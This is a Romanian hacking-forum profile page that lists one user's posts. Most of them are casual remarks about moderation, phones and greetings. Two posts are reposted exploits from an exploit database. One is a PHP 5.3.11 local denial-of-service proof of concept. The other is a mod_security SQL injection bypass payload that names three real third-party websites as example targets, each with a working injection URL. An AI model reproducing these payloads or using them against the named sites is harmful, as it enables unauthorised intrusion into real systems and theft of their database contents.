Jump to content

DarkyAngel

Active Members
  • Posts

    676
  • Joined

  • Last visited

  • Days Won

    7

Everything posted by DarkyAngel

  1. BZC a f?cut din nou, am dat report la mesaj, c? nu pot face screen. careva s? se ocupe de el, c? deja întrece limita.
  2. Mda, iar începe. Ban ! ar trebui cenzurat id-ul, ?i etc, p?r?i din mesajul lui
  3. înc? n-am primit, poate fac admini SE // cel cu bacala am primit, nu l-am bagat in seama, e cel mai bine .
  4. "PRINTE" , "MONTRU" ? GTFO cu kanalele D ?i ?tirile voastre, dac? era pe Discovery mai ziceam..
  5. nu d? prea bine.. încurajeaz? la spam.. cel mai bine cred c? ar fi dup? "vechime"
  6. v?d c? vrei s? te pi?i ?i pe regulament, având în vedere c? ai f?cut de vreo 3 ori 2x / 3x post..
  7. Vreau ?i eu ce-a fumat secure!
  8. Dup? cum zicea ?i sweby, tu ce ai f?cut pentru El ca s? te "ajute"?
  9. Eu încerc de vreo 2 zile s? fac onLive Desktop pe o tablet? de 8" ?i îmi zice c? func?ioneaz? doar pe cele cu ecran mai mare de 7" .
  10. Chuck Norris, save us ! @on, ?i eu sunt de partea PRO.
  11. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Angel Injection member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] PHP 5.3.11 (win) Local Denial Of Service [-] Found by Angel Injection [-] Link: www.php.net [-] Security -::RISK: High [-] http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Hussain) Team r00tw0rm (CrosS) Team <?php $crash = substr_replace($strlen,$crash, (strlen($crash)-0xc3)*+23,(strlen($crash))); for($crash1=0;$crash1<0x7e33;$crash1++) $crash2=array(); array_push($crash2); $crash = new VARIANT(0x0dcd438); com_print_typeinfo($crash); ?> PHP 5.3.11 (win) Local Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
  12. Ca sugestie. încearc? s? schimbi linkul în fiecare zi, ?i metoda de criptare la fel s? se chinuie pu?in dac? vor . // + rep.
  13. Motorola flipout.. waiting to get my S III
  14. DarkyAngel

    raid

    Gog nud ! ochim doi dintr-o lovitur? .
  15. DarkyAngel

    Scam

    FORM este un tag în html, ar fi bine s? ai minimul de cuno?tiin?e înainte s? încerci s? faci de-astea.
  16. Let me google that for you sau Let me google that for you
  17. La mul?i (b)ani !!! ?i mult? s?n?tate, c?-i mai bun? decât toate .
  18. ----------------------------------------------------------------- # Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22] mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
  19. ar fi ceva.. faza e ca eu la telefon n-am nici hdmi , în fine, poate s-or face adaptoare..
  20. "it can connect to any screen, the screen of a T.V, of a laptop, of a tablet, of a smartphone" .. Cum c?cat îl pun la 'smartphone' dac? n-am USB la el?
  21. Ce server, de ce joc, pe ce ruleaz? vps-ul , etc? d? ?i tu mai multe detalii
  22. E de ajuns ca s? n-o poat? decripta un sfert de forum .
  23. Welcome!
×
×
  • Create New...